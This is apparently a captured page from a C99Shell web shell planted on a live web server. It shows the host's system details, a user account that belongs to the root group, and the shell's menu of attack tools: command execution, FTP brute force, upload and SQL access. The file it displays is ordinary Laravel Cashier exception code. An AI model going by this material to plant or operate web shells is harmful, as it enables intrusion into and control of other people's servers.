!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/wataxi.picotech.app/public_html/vendor/laravel/cashier/src/Exceptions/   drwxr-xr-x
Free 28.47 GB of 117.98 GB (24.13%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     IncompletePayment.php (1.91 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Laravel\Cashier\Exceptions;

use 
Exception;
use 
Laravel\Cashier\Payment;
use 
Throwable;

class 
IncompletePayment extends Exception
{
    
/**
     * The Cashier Payment object.
     *
     * @var \Laravel\Cashier\Payment
     */
    
public $payment;

    
/**
     * Create a new IncompletePayment instance.
     *
     * @param  \Laravel\Cashier\Payment  $payment
     * @param  string  $message
     * @param  int  $code
     * @param  \Throwable|null  $previous
     * @return void
     */
    
public function __construct(Payment $payment$message ''$code 0Throwable $previous null)
    {
        
parent::__construct($message$code$previous);

        
$this->payment $payment;
    }

    
/**
     * Create a new IncompletePayment instance with a `payment_action_required` type.
     *
     * @param  \Laravel\Cashier\Payment  $payment
     * @return static
     */
    
public static function paymentMethodRequired(Payment $payment)
    {
        return new static(
            
$payment,
            
'The payment attempt failed because of an invalid payment method.'
        
);
    }

    
/**
     * Create a new IncompletePayment instance with a `requires_action` type.
     *
     * @param  \Laravel\Cashier\Payment  $payment
     * @return static
     */
    
public static function requiresAction(Payment $payment)
    {
        return new static(
            
$payment,
            
'The payment attempt failed because additional action is required before it can be completed.'
        
);
    }

    
/**
     * Create a new IncompletePayment instance with a `requires_confirmation` type.
     *
     * @param  \Laravel\Cashier\Payment  $payment
     * @return static
     */
    
public static function requiresConfirmation(Payment $payment)
    {
        return new static(
            
$payment,
            
'The payment attempt failed because it needs to be confirmed before it can be completed.'
        
);
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0074 ]--